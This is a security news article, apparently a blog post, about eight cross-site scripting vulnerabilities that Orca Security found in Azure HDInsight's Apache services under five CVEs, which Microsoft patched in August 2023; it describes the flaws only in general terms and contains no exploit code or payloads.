Cloud security firm Orca Security has unearthed a series of critical cross-site scripting (XSS) vulnerabilities within Azure HDInsight, potentially exposing data, session hijacking, and enabling malicious payloads. These vulnerabilities impact multiple Apache services, including Hadoop, Spark, Kafka, and Oozie, all operating under the Azure HDInsight ecosystem. Azure HDInsight, an open-source analytics service, empowers organizations to harness open-source frameworks within their Azure environment for robust big data analysis, management, and processing. In this comprehensive exploration, we delve into the nature of these vulnerabilities, their potential ramifications, and the remedial actions taken.
The Vulnerabilities
Orca Security’s investigation unveiled eight XSS vulnerabilities across the Azure HDInsight platform, documented under five separate CVE identifiers: CVE-2023-36881, CVE-2023-35394, CVE-2023-38188, CVE-2023-35393, and CVE-2023-36877. These vulnerabilities were identified by manipulating variables and exploiting functions, underlining the critical importance of input sanitization. The absence of adequate input sanitization allowed the rendering of malicious characters when the dashboard loaded, revealing a deficiency in output encoding.
CVE-2023-36881: Apache Ambari Background Operations
The initial issue, identified under CVE-2023-36881, centered on Apache Ambari Background Operations. Multiple default parameters in this component could be altered to execute an XSS attack. This vulnerability extended to the Ambari Managed Notifications component and the Ambari YARN Queue Manager. Exploitation avenues included manipulating alert notifications, tampering with Access Control functions, and injecting JavaScript code into specific YARN configurations.
CVE-2023-35394: Azure HDInsight’s Jupyter Notebook Service
CVE-2023-35394 exposed an XSS vulnerability within Azure HDInsight’s Jupyter Notebook service. This flaw could be leveraged for remote code execution by bypassing the Caja compiler’s sanitization process.
CVE-2023-38188: Apache Hadoop ResourceManager UI
Within Azure HDInsight, the Apache Hadoop ResourceManager UI was susceptible to container endpoint and port manipulation under CVE-2023-38188.
CVE-2023-35393: Apache Hive 2
Apache Hive 2, operating within Azure HDInsight, was vulnerable to container endpoint manipulation, as indicated by CVE-2023-35393.
CVE-2023-36877: Apache Oozie Web Console
CVE-2023-36877 highlighted a security gap in the Apache Oozie Web Console, allowing for XSS attacks via filter manipulation.
Remedial Actions and Microsoft’s Response
Orca Security promptly reported all identified vulnerabilities to Microsoft, which responded with a comprehensive resolution. These critical security issues were addressed through the deployment of security updates during the August 2023 Patch Tuesday for Azure HDInsight. This swift action serves as a testament to Microsoft’s commitment to bolstering the security and integrity of its cloud services.
Conclusion
The discovery of these eight XSS vulnerabilities within Azure HDInsight underscores the ongoing vigilance required to secure cloud-based ecosystems, particularly those involving critical data and analytics. Orca Security’s diligent investigation and Microsoft’s swift remedial measures demonstrate the importance of collaborative efforts in fortifying cloud platforms against potential threats. As the world increasingly relies on cloud-based solutions, robust security practices remain paramount in safeguarding sensitive information and upholding the integrity of vital services.